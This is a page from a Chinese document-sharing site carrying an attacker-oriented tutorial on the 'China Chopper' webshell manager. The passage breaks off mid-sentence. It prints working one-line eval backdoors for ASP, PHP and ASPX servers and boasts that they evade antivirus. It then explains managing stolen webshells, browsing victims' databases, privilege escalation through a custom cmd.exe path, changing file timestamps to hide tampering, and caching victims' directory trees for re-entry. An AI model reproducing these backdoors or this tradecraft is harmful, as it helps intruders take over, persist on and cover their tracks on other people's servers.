- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
中国菜刀高级应用方法
神器中国菜刀高级使用方法
[attach]268[/attach]Asp环境:%eval request(a)%Php环境:?php @eval($_POST[a]);?Aspx环境:% @page Language=Jscript%eval(Request.item[a],unsafe);%是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,就让我慢慢说明吧。1.就从最基本的讲起,你的脚本是不是经常被杀,你怎么变形都被杀,,传到服务器被杀导致被管理员发现,结果你的权限就没了,杀到你欲哭无泪。菜刀的一句话后门,可以避免这个问题,只有短短的一行代码,永远不会被查杀。2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了,框架变形,字体变框框,点击菜单无效,这个是因为系统语言不兼容造成的,菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。3.你是不是有很多webshell,你每次都拿记事本记下来,需要的时候,又去翻半天,弄得你很累很没脾气。有了“菜刀”,你可以很方便管理你的webshell,所有的记录都保存在加密的本地数据库里,而且支持webshell分类,让你管理得井井有条。菜刀不仅有临时锁定功能,方便你离开电脑的那小会时间不被别人偷你的webshell,也有加密功能,不输对密码,HOHO,偷了你的数据也没用。4.再来说说数据库管理,这个是菜刀最最强大的功能,精通各平台主流数据库的作者,把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库,支持不是最主要的,功能强大,人性化才是最主要的,“菜刀”的数据库操作界面,内置了常用的数据库语句,非常直观的表列名浏览功能,自动显示表名,列名,查询语句,非常人性化的设计,更内置了不少自建的函数,方便不懂数据库的菜鸟,都能查阅数据库里的数据,再说个“菜刀”数据库管理的一个小技巧,对于access数据库,可以在菜刀的webshell操作界面,对着MDB文件点右键,点Access Management,就直接进入Access的数据库操作界面了,方便吧,嘿嘿!!5.再说说提权这块,webshell的提权总是最让人关心的,说到提权,就不能说到webshell上的cmd执行了,有些朋友并不了解菜刀的自定义CMD路径功能,有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\cmd.exe,就可以了,或者把cmd.exe上传到目录,然后点右键,点virtual terminal file,就可以进入自定义CMD.EXE路径的命令行了,同样的,再给个cmd使用的小技巧,在菜刀的命令行里,可以使用cd等命令跳转目录,方便吧,嘿嘿!!嗯,另外,新版菜刀新增常用目录管理功能,你可以把你常用的目录或者提权的目录加进菜刀里,这样很方便你提权或者日常工作,是不是比那些固定了提权目录的脚本后门要牛B的多啊,哈哈。6.还有菜刀的webshell上的文件功能功能,也是非常人性化的,文件夹和文件的图标完全模枋windows,,文件日期,文件大小,文件权限,一目了然,尤其是修改文件时间功能,非常的方便,直接对着要修改时间的文件点右键,modify the file time,然后在文件的时间那栏,输入时间,回车,就修改完了。当然,菜刀的文件管理还有新建,删除,上传,下载,编辑功能,这些大同小异,就不一一细说了。不过有个功能,还是要重点说明的,那就是目录缓存功能,菜刀可以把浏览过的webshell目录都缓存在本地,这样可以方便下次访问的时候更加快捷,最重要的是,当哪天你的权限丢了,起码你还有对方服务器的文件目录结构,方便再一次渗透。说完大家都有的脚本后门功能,现在来说点特别的菜刀功能,非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器,再结合了作者之前的web管理软件等几个工具的优点,实在是大杀器的集合体。1:蜘蛛爬行。我很喜欢用WVS,对于WEB安全这块,功能是非常的强大,我很喜欢里面的一个功能,目录爬行,可以把WEB站的文件目录结构以很直观的形式排列出来,很方便分析。我非常惊喜的发现,菜刀居然也有这个功能,叫蜘蛛爬行。用法:{spider} {url:/}设定爬行范围{spider} {url:/} {range:}跟WVS的功能完全一样,我上次上传webshell图片的时候,不知道脚本后门给传到哪个目录,结果
您可能关注的文档
最近下载
- pep人教版六年级上学期英语全学期课时作业练习题.doc VIP
- 电气控制与PLC教案.pdf VIP
- NBT20277-2014 A240(S32101)双相不锈钢焊接规范.pdf VIP
- 2025秋人教版(PEP)(2024)三年级上册英语教学计划.docx VIP
- 初一英语文化课件.pptx VIP
- 高标准农田监理大纲方案投标文件(技术方案).doc
- 第一单元 第1课《可爱的我们》核心素养教学设计 2025湘美版美术三年级上册.pdf
- 2025云南省中职职教高考职业技能考烹饪类专业理论测试模拟05.doc VIP
- 客服人员心态与沟通技巧培训PPT.pptx VIP
- 农村公共卫生与健康促进.pptx VIP
文档评论(0)